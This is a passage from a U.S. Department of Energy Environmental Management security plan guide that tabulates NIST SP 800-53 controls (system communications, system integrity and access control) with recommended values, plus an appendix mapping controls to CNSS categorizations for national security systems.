EM SupplementalGuidance
SC-20
bSecure Name/Address
Resolution Service(Authoritative Source)
The information system:Provides the means toindicate the security statusof child zones and (if thechild supports secureresolution services) toenable verification of achain of trust among parentand childdomains, when operating aspart of a distributed,hierarchical namespace.
SC-21
Secure Name/AddressResolution Service
(Recursive or CachingResolver)
The information systemrequests and performs dataorigin authentication anddata integrity verification onthe name/address resolutionresponses the systemreceives from authoritativesources
SC-22
Architecture andProvisioning forName/Address
Resolution Service
The information systemsthat collectively providename/address resolutionservice for an organizationare fault-tolerant andimplement internal/externalrole separation.
A domain name system(DNS) server is an exampleof an information system thatprovides name/addressresolution service. Toeliminate single points offailure and to enhanceredundancy, there aretypically at least twoauthoritative domain namesystem (DNS) servers, oneconfigured as primary andthe other as secondary.
SC-23
Session Authenticity
The information systemprovides mechanisms toprotect the authenticity ofcommunications sessions.
This control focuses oncommunications protection atthe session, versus packet,level. The intent of thiscontrol is to establishgrounds for confidence ateach end of acommunications session inthe ongoing identity of theother party and in the validityof the information beingtransmitted.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
140 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SC-28
Protection ofInformation at Rest
The information systemprotects the [Selection (oneor more): confidentiality;integrity] of [Assignment:organization-definedinformation at rest].
This control is intended toaddress the confidentialityand integrity of informationat rest in nonmobile devicesand covers user informationand system information.
SC-39
Process Isolation
The information systemmaintains a separateexecution domain for eachexecuting process.
SI-1 0 a 1System and
Information IntegrityPolicy and Procedures
The organization: Develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:A system and informationintegrity policy thataddresses purpose, scope,roles, responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and
Security Staff andAdministrative Staff
SI-1 0 a 2System and
Information IntegrityPolicy and Procedures
The organization: Develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:Procedures to facilitate theimplementation of thesystem and informationintegrity policy andassociated system andinformation integritycontrols; and
Security Staff andAdministrative Staff
SI-1 0 b 1System and
Information IntegrityPolicy and Procedures
The organization: Reviewsand updates the current:System and informationintegrity policy[Assignment: organization-defined frequency]; and
Annually or any timethere is a major change
SI-1 0 b 2System and
Information IntegrityPolicy and Procedures
The organization: Reviewsand updates the current:System and informationintegrity procedures[Assignment: organization-defined frequency].
Annually or any timethere is a major change
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
141 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SI-2 0 a Flaw RemediationThe organization: Identifies,reports, and correctsinformation system flaws;
SI-2 0 b Flaw Remediation
The organization: Testssoftware and firmwareupdates related to flawremediation foreffectiveness and potentialside effects beforeinstallation;
SI-2 0 c Flaw Remediation
The organization: Installssecurity-relevant softwareand firmware updates within[Assignment: organizationdefined time period] of therelease of the updates; and
5 days for criticalupdates and 10 days for
high and moderate.
Vulnerability scans should berun shortly after patching toensure all patches wereimplemented successfully.All exceptions should beinvestigated.
SI-2 0 d Flaw Remediation
The organization:Incorporates flawremediation into theorganizational configurationmanagement process.
SI-2 2 Flaw Remediation
The organization employsautomated mechanisms[Assignment: organization-defined frequency] todetermine the state ofinformation systemcomponents with regard toflaw remediation.
Weekly
SI-3 0 aMalicious Code
Protection
The organization: Employsmalicious code protectionmechanisms at informationsystem entry and exit pointsto detect and eradicatemalicious code;
The EM enterprise fullpacket capture is part of theEM sites malicious codeprotection.
SI-3 0 bMalicious Code
Protection
The organization: Updatesmalicious code protectionmechanisms whenever newreleases are available inaccordance withorganizational configurationmanagement policy andprocedures;
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
142 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SI-3 0 c 1Malicious Code
Protection
The organization:Configures malicious codeprotection mechanisms to:Perform periodic scans ofthe information system[Assignment: organization-defined frequency] and real-time scans of files fromexternal sources at[Selection (one or more);endpoint; network entry/exitpoints] as the files aredownloaded, opened, orexecuted in accordance withorganizational securitypolicy; and
Daily
SI-3 0 c 2Malicious Code
Protection
The organization:Configures malicious codeprotection mechanisms to:[Selection (one or more):block malicious code;quarantine malicious code;send alert to administrator;[Assignment: organization-defined action]] in responseto malicious code detection;and
Block/quarantinemalicious code thensend an alert to the
administrators
SI-3 0 dMalicious Code
Protection
The organization: Addressesthe receipt of false positivesduring malicious codedetection and eradicationand the resulting potentialimpact on the availability ofthe information system.
SI-3 1Malicious Code
Protection
The organization centrallymanages malicious codeprotection mechanisms.
SI-3 2Malicious Code
Protection
The information systemautomatically updatesmalicious code protectionmechanisms.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
143 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SI-4 0 a 1Information System
Monitoring
The organization: Monitorsthe information system todetect: Attacks andindicators of potentialattacks in accordance with[Assignment: organizationdefined monitoringobjectives]; and
Network monitoringand incident
identification section ofthe incident response
plan
Information systemmonitoring includes externaland internal monitoring.External monitoring includesthe observation of eventsoccurring at the systemboundary (i.e., part ofperimeter defense andboundary protection).Internal monitoring includesthe observation of eventsoccurring within the system(e.g., within internalorganizational networks andsystem components).
SI-4 0 a 2Information System
Monitoring
The organization: Monitorsthe information system todetect: Unauthorized local,network, and remoteconnections;
SI-4 0 bInformation System
Monitoring
The organization: Identifiesunauthorized use of theinformation system through[Assignment: organizationdefined techniques andmethods];
SI-4 0 cInformation System
Monitoring
The organization: Deploysmonitoring devices: (i)strategically within theinformation system tocollect organization-determined essentialinformation; and (ii) at adhoc locations within thesystem to track specifictypes of transactions ofinterest to the organization;
SI-4 0 dInformation System
Monitoring
The organization: Protectsinformation obtained fromintrusion-monitoring toolsfrom unauthorized access,modification, and deletion;
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
144 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SI-4 0 eInformation System
Monitoring
The organization: Heightensthe level of informationsystem monitoring activitywhenever there is anindication of increased riskto organizational operationsand assets, individuals,other organizations, or theNation based on lawenforcement information,intelligence information, orother credible sources ofinformation;
SI-4 0 fInformation System
Monitoring
The organization: Obtainslegal opinion with regard toinformation systemmonitoring activities inaccordance with applicablefederal laws, ExecutiveOrders, directives, policies,or regulations; and
SI-4 0 gInformation System
Monitoring
The organization: Provides[Assignment: organization-defined information systemmonitoring information] to[Assignment: organization-defined personnel or roles][Selection (one or more): asneeded; [Assignment:organization-definedfrequency]].
SI-4 2Information System
Monitoring
The organization employsautomated tools to supportnear real-time analysis ofevents.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
145 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SI-4 4Information System
Monitoring
The information systemmonitors inbound andoutbound communicationstraffic [Assignment:organization-definedfrequency] for unusual orunauthorized activities orconditions.
Unusual/unauthorizedactivities or conditionsinclude, for example, internaltraffic that indicates thepresence of malicious codewithin an information systemor propagating among systemcomponents, theunauthorized export ofinformation, or beaconing toan external informationsystem. Evidence ofmalicious code is used toidentify potentiallycompromised informationsystems or informationsystem components.
SI-4 5Information System
Monitoring
The information systemalerts [Assignment:organization-definedpersonnel or roles] when thefollowing indications ofcompromise or potentialcompromise occur:[Assignment: organizationdefined compromiseindicators].
SI-5 0 aSecurity Alerts,Advisories, and
Directives
The organization: Receivesinformation system securityalerts, advisories, anddirectives from[Assignment: organization-defined externalorganizations] on anongoing basis;
JC3 and EM MIPP
SI-5 0 bSecurity Alerts,Advisories, and
Directives
The organization: Generatesinternal security alerts,advisories, and directives asdeemed necessary;
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
146 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SI-5 0 cSecurity Alerts,Advisories, and
Directives
The organization:Disseminates security alerts,advisories, and directives to:[Selection (one or more):[Assignment: organization-defined personnel or roles];[Assignment: organization-defined elements within theorganization]; [Assignment:organization-definedexternal organizations]]; and
SI-5 0 dSecurity Alerts,Advisories, and
Directives
The organization:Implements securitydirectives in accordancewith established timeframes, or notifies theissuing organization of thedegree of noncompliance.
SI-7 0Software and
Information Integrity
The organization employsintegrity verification tools todetect unauthorized changesto [Assignment:organization-definedsoftware, firmware, andinformation].
SI-7 1Software and
Information Integrity
The information systemperforms an integrity checkof [Assignment:organization-definedsoftware, firmware, andinformation] [Selection (oneor more): at startup; at[Assignment: organization-defined transitional states orsecurity-relevant events];[Assignment: organizationdefined frequency]].
Quarterly
The site employs integrityverification applications onkey information systems(e.g., servers that process andstore CUI) to look forevidence of informationtampering, errors, andomissions. The site employsgood software engineeringpractices with regard tocommercial off-the-shelfintegrity mechanisms (e.g.,parity checks, cyclicalredundancy checks,cryptographic hashes) anduses tools to automaticallymonitor the integrity of theinformation system and theapplications it hosts.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
147 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SI-7 7Software and
Information Integrity
The organizationincorporates the detection ofunauthorized [Assignment:organization-definedsecurity-relevant changes tothe information system] intothe organizational incidentresponse capability.
SI-8 0 a Spam Protection
The organization: Employsspam protectionmechanisms at informationsystem entry and exit pointsto detect and take action onunsolicited messages; and
SI-8 0 b Spam Protection
The organization: Updatesspam protectionmechanisms when newreleases are available inaccordance withorganizational configurationmanagement policy andprocedures.
SI-8 1 Spam ProtectionThe organization centrallymanages spam protectionmechanisms.
SI-8 2 Spam ProtectionThe information systemautomatically updates spamprotection mechanisms.
SI-10
0Information Input
Validation
The information systemchecks the validity of[Assignment: organization-defined information inputs].
Rules for checking the validsyntax and semantics ofinformation system inputs(e.g., character set, length,numerical range, acceptablevalues) are in place to verifythat inputs match specifieddefinitions for format andcontent. Inputs passed tointerpreters are prescreenedto prevent the content frombeing unintentionallyinterpreted as commands.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
148 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SI-11
0 a Error Handling
The information system:Generates error messagesthat provide informationnecessary for correctiveactions without revealinginformation that could beexploited by adversaries;and
The structure and content oferror messages are carefullyconsidered by theorganization. The extent towhich the information systemis able to identify and handleerror conditions is guided byorganizational policy andoperational requirements.Error messages should bemade available to systemadministrators and not besent to the user or potentialattacker.
SI-11
0 b Error Handling
The information system:Reveals error messages onlyto [Assignment:organization-definedpersonnel or roles].
SI-12
0Information Handling
and Retention
The organization handlesand retains informationwithin the informationsystem and informationoutput from the system inaccordance with applicablefederal laws, ExecutiveOrders, directives, policies,regulations, standards, andoperational requirements.
The output handling andretention requirements coverthe full life cycle of theinformation, in some casesextending beyond thedisposal of the informationsystem.
SI-16
0 Memory Protection
The information systemimplements [Assignment:organization-definedsecurity safeguards] toprotect its memory fromunauthorized codeexecution.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
149 of 266
Appendix B – NSS Security Controls
Based on early assessments on NSS Security Controls using CNSS 1253 and NIST SP800-53 Rev 3 controls, EM has determined that most systems will be categorized as a C= M, I = M, and A = M, or C = M, I = M, and A = L, or C = M, I = L and A = L. Beloware the controls that should be addressed for each categorization and configuration, (e.g.,networked or stand-alone). “No” in the column for either a stand-alone or networkconfiguration means that it does not apply and does not have to be implemented. “Yes”means that it should be addressed and a justification given if the control is tailored out. Asite may decide to deploy a control that does not apply depending on its risk managementstrategy. Contracting Officers are not to require that each and every control listed in thistable be implemented.
Cntl #: Lists the NIST control abbreviationControl Name: Lists the name of the controls requirementCIA (LMH) Lists each CNSSI control requirement by Confidentiality (C),
Integrity (I), and Availability (A) and Low (L), Moderate (M), andHigh (H)
NNN (LMH) Lists the NIST 800-53 Low (L), Moderate (M), and High (H)control selections associated with the CNSSI controls
NSS Stand Alone Lists if the control is applicable to a NSS Stand-Alone PCNSS Network Lists if the control is applicable to a NSS Networked PC(s)Priority Lists the NIST control priorityNIST Control Req Lists the NIST control requirement
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
AC-1Access Control
Policy AndProcedures
X X X X X X X X X X X X Yes Yes P1
The organization develops,disseminates, andreviews/updates[Assignment: organization-defined frequency]: a) Aformal, documented accesscontrol policy that addressespurpose, scope, roles,responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and b) Formal,documented procedures tofacilitate the implementationof the access control policyand associated accesscontrols.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
150 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
AC-2Account
ManagementX X X X X X X Yes Yes P1
The organization managesinformation systemaccounts, including: a)Identifying account types(i.e., individual, group,system, application,guest/anonymous, andtemporary); b) Establishingconditions for groupmembership; c) Identifyingauthorized users of theinformation system andspecifying access privileges;d) Requiring appropriateapprovals for requests toestablish accounts; e)Establishing, activating,modifying, disabling, andremoving accounts; f)Specifically authorizing andmonitoring the use ofguest/anonymous andtemporary accounts; g)Notifying account managerswhen temporary accountsare no longer required andwhen information systemusers are terminated,transferred, or informationsystem usage or need-to-know/need-to-sharechanges; h) Deactivating: (i)temporary accounts that areno longer required; and (ii)accounts of terminated ortransferred users; i)Granting access to thesystem based on: (i) a validaccess authorization; (ii)intended system usage; and(iii) other attributes asrequired by the organizationor associatedmissions/businessfunctions; and j) Reviewingaccounts [Assignment:organization-definedfrequency].
AC-2(1)Account
ManagementX X X X X X X X Yes Yes P1
The organization employsautomated mechanisms tosupport the management ofinformation systemaccounts.
AC-2(2)Account
ManagementX X X X X X X X Yes Yes P1
The information systemautomatically terminatestemporary and emergencyaccounts after [Assignment:organization-defined timeperiod for each type ofaccount].
AC-2(3)Account
ManagementX X X X X X X X Yes Yes P1
The information systemautomatically disablesinactive accounts after[Assignment: organization-defined time period].
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
151 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
AC-2(4)Account
ManagementX X X X X X X X Yes Yes P1
The information systemautomatically audits accountcreation, modification,disabling, and terminationactions and notifies, asrequired, appropriateindividuals.
AC-2(5)Account
ManagementYes Yes PO
The organization: a)Requires that users log outwhen [Assignment:organization defined time-period of expected inactivityand/or description of whento log out]; b) Determinesnormal time-of-day andduration usage forinformation systemaccounts; c) Monitors foratypical usage ofinformation systemaccounts; and d) Reportsatypical usage to designatedorganizational officials.
AC-2(6)Account
Management
The information systemdynamically manages userprivileges and associatedaccess authorizations.
AC-2(7)Account
ManagementX X X X X X No Yes P1
The organization: a)Establishes and administersprivileged user accounts inaccordance with a role-based access scheme thatorganizes informationsystem and networkprivileges into roles; and b)Tracks and monitorsprivileged role assignments.
AC-3 Access Enforcement X X X X X X X X X Yes Yes P1
The information systemenforces approvedauthorizations for logicalaccess to the system inaccordance with applicablepolicy.
AC 3(1) Access Enforcement - - - - - - - - - withdrawn
AC-3(2) Access Enforcement
The information systemenforces dual authorization,based on organizationalpolicies and procedures for[Assignment: organization-defined privilegedcommands].
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
152 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
AC-3(3) Access Enforcement
The information systemenforces [Assignment:organization-definednondiscretionary accesscontrol policies] over[Assignment: organization-defined set of users andresources] where the policyrule set for each policyspecifies: a) Access controlinformation (i.e., attributes)employed by the policy ruleset (e.g., position,nationality, age, project,time of day); and b)Required relationshipsamong the access controlinformation to permitaccess.
AC-3(4) Access Enforcement X X X X X X Yes Yes PO
The information systemenforces a DiscretionaryAccess Control (DAC) policythat: a) Allows users tospecify and control sharingby named individuals orgroups of individuals, or byboth; b) Limits propagationof access rights; and c)Includes or excludes accessto the granularity of a singleuser.
AC-3(5) Access Enforcement
The information systemprevents access to[Assignment: organization-defined security-relevantinformation] except duringsecure, nonoperable systemstates.
AC-3(6) Access Enforcement X Yes Yes P1
The organization encrypts orstores off-line in a securelocation [Assignment:organization-defined userand/or system information].
AC-4Information Flow
EnforcementX X X X X X X X No No P1
The information systemenforces approvedauthorizations for controllingthe flow of informationwithin the system andbetween interconnectedsystems in accordance withapplicable policy.
AC-4(1)Information Flow
Enforcement
The information systemenforces information flowcontrol using explicit securityattributes on information,source, and destinationobjects as a basis for flowcontrol decisions.
AC-4(2)Information Flow
Enforcement
The information systemenforces information flowcontrol using protectedprocessing domains (e.g.,domain type-enforcement)as a basis for flow controldecisions.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
153 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
AC-4(3)Information Flow
Enforcement
The information systemenforces dynamicinformation flow controlbased on policy that allowsor disallows informationflows based on changingconditions or operationalconsiderations.
AC-4(4)Information Flow
Enforcement
The information systemprevents encrypted datafrom bypassing content-checking mechanisms.
AC-4(5)Information Flow
Enforcement
The information systemenforces [Assignment:organization-definedlimitations on theembedding of data typeswithin other data types].
AC-4(6)Information Flow
Enforcement
The information systemenforces information flowcontrol on metadata.
AC-4(7)Information Flow
Enforcement
The information systemenforces [Assignment:organization-defined one-way flows] using hardwaremechanisms.
AC-4(8)Information Flow
Enforcement
The information systemenforces information flowcontrol using [Assignment:organization-definedsecurity policy filters] as abasis for flow controldecisions.
AC-4(9)Information Flow
Enforcement
The information systemenforces the use of humanreview for [Assignment:organization-definedsecurity policy filters] whenthe system is not capable ofmaking an information flowcontrol decision.
AC-4(10)Information Flow
Enforcement
The information systemprovides the capability for aprivileged administrator toenable/disable [Assignment:organization-definedsecurity policy filters].
AC-4(11)Information Flow
Enforcement
The information systemprovides the capability for aprivileged administrator toconfigure [Assignment:organization-definedsecurity policy filters] tosupport different securitypolicies.
AC-4(12)Information Flow
Enforcement
The information system,when transferringinformation betweendifferent security domains,identifies information flowsby data type specificationand usage.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
154 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
AC-4(13)Information Flow
Enforcement
The information system,when transferringinformation betweendifferent security domains,decomposes informationinto policy-relevantsubcomponents forsubmission to policyenforcement mechanisms.
AC-4(14)Information Flow
Enforcement
The information system,when transferringinformation betweendifferent security domains,implements policy filtersthat constrain data structureand content to [Assignment:organization-definedinformation security policyrequirements].
AC-4(15)Information Flow
Enforcement
The information system,when transferringinformation betweendifferent security domains,detects unsanctionedinformation and prohibitsthe transfer of suchinformation in accordancewith the security policy.
AC-4(16)Information Flow
Enforcement
The information systemenforces security policiesregarding information oninterconnected systems.
AC-4(17)Information Flow
Enforcement
The information system: a)Uniquely identifies andauthenticates source anddestination domains forinformation transfer; b)Binds security attributes toinformation to facilitateinformation flow policyenforcement; and c) Tracksproblems associated withthe security attribute bindingand information transfer.
AC-5Separation Of
DutiesX X X X X X X X Yes Yes P1
The organization: a)Separates duties ofindividuals as necessary, toprevent malevolent activitywithout collusion; b)Documents separation ofduties; and c) Implementsseparation of duties throughassigned information systemaccess authorizations.
AC-6 Least Privilege X X X X X X X X Yes Yes P1
The organization employsthe concept of leastprivilege, allowing onlyauthorized accesses forusers (and processes actingon behalf of users) whichare necessary to accomplishassigned tasks inaccordance withorganizational missions andbusiness functions.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
155 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
AC-6(1) Least Privilege X X X X X X X X Yes Yes P1
The organization explicitlyauthorizes access to[Assignment: organization-defined list of securityfunctions (deployed inhardware, software, andfirmware) and security-relevant information].
AC-6(2) Least Privilege X X X X X X X X Yes Yes P1
The organization requiresthat users of informationsystem accounts, or roles,with access to [Assignment:organization-defined list ofsecurity functions orsecurity-relevantinformation], use non-privileged accounts, or roles,when accessing othersystem functions, and iffeasible, audits any use ofprivileged accounts, or roles,for such functions.
AC-6(3) Least Privilege
The organization authorizesnetwork access to[Assignment: organization-defined privilegedcommands] only forcompelling operationalneeds and documents therationale for such access inthe security plan for theinformation system.
AC-6(4) Least Privilege
The information systemprovides separateprocessing domains toenable finer-grainedallocation of user privileges.
AC-6(5) Least Privilege X X X X X X Yes Yes PO
The organization limitsauthorization to super useraccounts on the informationsystem to designatedsystem administrationpersonnel.
AC-6(6) Least Privilege X X Yes Yes PO
The organization prohibitsprivileged access to theinformation system by non-organizational users.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
156 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
AC-7Unsuccessful Login
AttemptsX X X X X X X X X X X X Yes Yes P2
The information system: a)Enforces a limit of[Assignment: organization-defined number]consecutive invalid loginattempts by a user during a[Assignment: organization-defined time period]; and b)Automatically [Selection:locks the account/node foran [Assignment:organization-defined timeperiod]; locks theaccount/node until releasedby an administrator; delaysnext login prompt accordingto [Assignment:organization-defined delayalgorithm]] when themaximum number ofunsuccessful attempts isexceeded. The controlapplies regardless ofwhether the login occurs viaa local or networkconnection.
AC-7(1)Unsuccessful Login
AttemptsX X X X Yes Yes PO
The information systemautomatically locks theaccount/node until releasedby an administrator whenthe maximum number ofunsuccessful attempts isexceeded.
AC-7(2)Unsuccessful Login
Attempts
The information systemprovides additionalprotection for mobiledevices accessed via loginby purging information fromthe device after[Assignment: organization-defined number]consecutive, unsuccessfullogin attempts to the device.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
157 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
AC-8System UseNotification
X X X X X X X X X Yes Yes P1
The information system: a)Displays an approvedsystem use notificationmessage or banner beforegranting access to thesystem that provides privacyand security noticesconsistent with applicablefederal laws, ExecutiveOrders, directives, policies,regulations, standards, andguidance and states that: (i)users are accessing a U.S.Government informationsystem; (ii) system usagemay be monitored, recorded,and subject to audit; (iii)unauthorized use of thesystem is prohibited andsubject to criminal and civilpenalties; and (iv) use of thesystem indicates consent tomonitoring and recording; b)Retains the notificationmessage or banner on thescreen until users takeexplicit actions to log on toor further access theinformation system; and c)For publicly accessiblesystems: (i) displays thesystem use informationwhen appropriate, beforegranting further access; (ii)displays references, if any,to monitoring, recording, orauditing that are consistentwith privacyaccommodations for suchsystems that generallyprohibit those activities; and(iii) includes in the noticegiven to public users of theinformation system, adescription of the authorizeduses of the system.
AC-9Previous Logon
(Access) NotificationX X No No P0
The information systemnotifies the user, uponsuccessful logon (access), ofthe date and time of the lastlogon (access).
AC-10Concurrent Session
ControlX X X X X Yes Yes P2
The information systemlimits the number ofconcurrent sessions foreach system account to[Assignment: organization-defined number].
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
158 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
AC-11 Session Lock X X X X X X X X Yes Yes P3
The information system: a)Prevents further access tothe system by initiating asession lock after[Assignment: organization-defined time period] ofinactivity or upon receiving arequest from a user; and b)Retains the session lockuntil the user reestablishesaccess using establishedidentification andauthentication procedures.
AC-11(1) Session Lock X X X Yes Yes PO
The information systemsession lock mechanism,when activated on a devicewith a display screen, placesa publicly viewable patternonto the associated display,hiding what was previouslyvisible on the screen.
AC-14
Permitted ActionsWithout
Identification OrAuthentication
X X X X X X X X X Yes Yes P1
The organization: a)Identifies specific useractions that can beperformed on theinformation system withoutidentification orauthentication; and b)Documents and providessupporting rationale in thesecurity plan for theinformation system, useractions not requiringidentification andauthentication.
AC-14(1)
Permitted ActionsWithout
Identification OrAuthentication
X X X X X X Yes Yes P1
The organization permitsactions to be performedwithout identification andauthentication only to theextent necessary toaccomplishmission/businessobjectives.
AC-17 Remote Access X X X X X X X X X Yes Yes P1
The organization: a)Documents allowedmethods of remote accessto the information system; b)Establishes usagerestrictions andimplementation guidance foreach allowed remote accessmethod; c) Monitors forunauthorized remote accessto the information system; d)Authorizes remote access tothe information system priorto connection; and e)Enforces requirements forremote connections to theinformation system.
AC-17(1) Remote Access X X X X X X X X Yes Yes P1
The organization employsautomated mechanisms tofacilitate the monitoring andcontrol of remote accessmethods.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
159 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
AC-17(2) Remote Access X X X X X X X X Yes Yes P1
The organization usescryptography to protect theconfidentiality and integrityof remote access sessions.
AC-17(3) Remote Access X X X X X X X X Yes Yes P1
The information systemroutes all remote accessesthrough a limited number ofmanaged access controlpoints.
AC-17(4) Remote Access X X X X X X X X Yes Yes P1
The organization authorizesthe execution of privilegedcommands and access tosecurity-relevant informationvia remote access only forcompelling operationalneeds and documents therationale for such access inthe security plan for theinformation system.
AC-17(5) Remote Access X X X X X X X X Yes Yes P1
The organization monitorsfor unauthorized remoteconnections to theinformation system[Assignment: organization-defined frequency], andtakes appropriate action ifan unauthorized connectionis discovered.
AC-17(6) Remote Access X X X Yes Yes PO
The organization ensuresthat users protectinformation about remoteaccess mechanisms fromunauthorized use anddisclosure.
AC-17(7) Remote Access X X X X X X X X Yes Yes P1
The organization ensuresthat remote sessions foraccessing [Assignment:organization-defined list ofsecurity functions andsecurity-relevantinformation] employ[Assignment: organization-defined additional securitymeasures] and are audited.
AC-17(8) Remote Access X X X X X X X X Yes Yes P1
The organization disables[Assignment: organization-defined networkingprotocols within theinformation system deemedto be nonsecure] except forexplicitly identifiedcomponents in support ofspecific operationalrequirements.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
160 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
AC-18Wireless Access
RestrictionsX X X X X X X X X No No P1
The organization: a)Establishes usagerestrictions andimplementation guidance forwireless access; b) Monitorsfor unauthorized wirelessaccess to the informationsystem; c) Authorizeswireless access to theinformation system prior toconnection; and e) Enforcesrequirements for wirelessconnections to theinformation system.
AC-18(1)Wireless Access
RestrictionsX X X X X X X X No No P1
The information systemprotects wireless access tothe system usingauthentication andencryption.
AC-18(2)Wireless Access
RestrictionsX X X X X X X No No PO
The organization monitorsfor unauthorized wirelessconnections to theinformation system,including scanning forunauthorized wirelessaccess points [Assignment:organization-definedfrequency], and takesappropriate action if anunauthorized connection isdiscovered.
AC-18(3)Wireless Access
RestrictionsX X X X X X No No PO
The organization disables,when not intended for use,wireless networkingcapabilities internallyembedded withininformation systemcomponents prior toissuance and deployment.
AC-18(4)Wireless Access
RestrictionsX X X X X X X No No PO
The organization does notallow users to independentlyconfigure wirelessnetworking capabilities.
AC-18(5)Wireless Access
RestrictionsX X X X X X X No No PO
The organization confineswireless communications toorganization-controlledboundaries.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
161 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
AC-19Access Control For
Mobile DevicesX X X X X X X X X Yes Yes P1
The organization: a)Establishes usagerestrictions andimplementation guidance fororganization-controlledmobile devices; b)Authorizes connection ofmobile devices meetingorganizational usagerestrictions andimplementation guidance toorganizational informationsystems; c) Monitors forunauthorized connections ofmobile devices toorganizational informationsystems; d) Enforcesrequirements for theconnection of mobiledevices to organizationalinformation systems; e)Disables information systemfunctionality that providesthe capability for automaticexecution of code on mobiledevices without userdirection; f) Issues speciallyconfigured mobile devices toindividuals traveling tolocations that theorganization deems to be ofsignificant risk inaccordance withorganizational policies andprocedures; and g) Applies[Assignment: organization-defined inspection andpreventative measures] tomobile devices returningfrom locations that theorganization deems to be ofsignificant risk inaccordance withorganizational policies andprocedures.
AC-19(1)Access Control For
Mobile DevicesX X X X X Yes Yes P1
The organization restrictsthe use of writable,removable media inorganizational informationsystems.
AC-19(2)Access Control For
Mobile DevicesX X X X X X X X Yes Yes P1
The organization prohibitsthe use of personally owned,removable media inorganizational informationsystems.
AC-19(3)Access Control For
Mobile DevicesX X X X X X X X Yes Yes P1
The organization prohibitsthe use of removable mediain organizational informationsystems when the mediahas no identifiable owner.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
162 of 266
C C C I I I A A A N N N
Cntl # Control Name L M H L M H L M H L M HNSS
StandAlone
NSSNetwork
Priority NIST Control Requirement
AC-19(4)Access Control For
Mobile DevicesX X X Yes Yes PO
